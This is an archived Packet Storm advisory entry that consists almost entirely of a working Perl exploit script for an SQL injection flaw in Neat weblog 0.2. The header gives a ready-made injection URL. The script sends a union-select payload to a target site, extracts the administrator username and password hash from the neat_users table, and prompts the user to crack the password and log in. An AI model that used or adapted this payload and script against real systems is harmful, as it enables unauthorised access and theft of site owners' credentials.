neatweblog-sql.txt

2008-04-01T00:00:00
ID PACKETSTORM:65063
Type packetstorm
Reporter IRCRASH
Modified 2008-04-01T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#####################################################################################  
#### Neat weblog 0.2 ####  
#### SQL Injection Exploit ####  
#####################################################################################  
# #  
#Discovered by : IRCRASH (Dr.Crash) #  
#Exploited By : Dr.Crash #  
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm #  
# #  
#####################################################################################  
# #  
#Script Download : http://kent.dl.sourceforge.net/sourceforge/neat-web/neat0.2.zip #  
# #  
#####################################################################################  
# < SQL > #  
#SQL Address : http://Sitename/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(user,0x120,password),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*  
# #  
#####################################################################################  
# Our site : Http://IRCRASH.COM #  
#####################################################################################  
  
use LWP;  
use HTTP::Request;  
use Getopt::Long;  
  
  
sub header  
{  
print "  
****************************************************  
* Neat weblog 0.2 Sql Injection exploit *  
****************************************************  
*AUTHOR : IRCRASH *  
*Discovered by : IRCRASH (Dr.Crash) *  
*Our Site : IRCRASH.COM *  
****************************************************";  
}  
  
sub usage  
{  
print "  
* Usage : perl $0 -url http://Sitename/  
****************************************************  
";  
}   
  
  
my %parameter = ();  
GetOptions(\%parameter, "url=s");  
  
$url = $parameter{"url"};  
  
if(!$url)  
{  
header();  
usage();  
exit;  
}  
if($url !~ /\//){$url = $url."/";}  
if($url !~ /http:\/\//){$url = "http://".$url;}  
$vul = "/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*";  
sub Exploit()  
{  
$requestpage = $url.$vul;  
print "Requesting Page is ".$url."\n";  
  
my $req = HTTP::Request->new("POST",$requestpage);  
$ua = LWP::UserAgent->new;  
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );  
$req->referer($url);  
$req->referer("http://IRCRASH.COM");  
$req->content_type('application/x-www-form-urlencoded');  
$req->header("content-length" => $contlen);  
$req->content($poststring);  
  
$response = $ua->request($req);  
$content = $response->content;  
$header = $response->headers_as_string();  
  
#Debug Modus delete # at beginning of next line  
#print $content;  
  
@name = split(/Login:/,$content);  
$name = @name[1];  
@name = split(/<enduser>/,$name);  
$name = @name[0];  
  
@password = split(/Password:/,$content);  
$password = @password[1];  
@password = split(/<endpass>/,$password);  
$password = @password[0];  
  
if(!$name && !$password)  
{  
print "\n\n";  
print "!Exploit failed ! :(\n\n";  
exit;  
}  
  
print "Username: ".$name."\n";  
print "Password: " .$password."\n\n";  
print "Crack Password And Login In : $url/index.php?action=login\n";  
print "Enjoy My friend .....\n";  
  
}  
  
#Starting;  
print "  
****************************************************  
* Neat weblog 0.2 Sql Injection exploit *  
****************************************************  
*AUTHOR : IRCRASH *  
*Discovered by : IRCRASH (Dr.Crash) *  
*Our Site : IRCRASH.COM *  
****************************************************";  
print "\n\nExploiting...\n";  
Exploit();  
  
`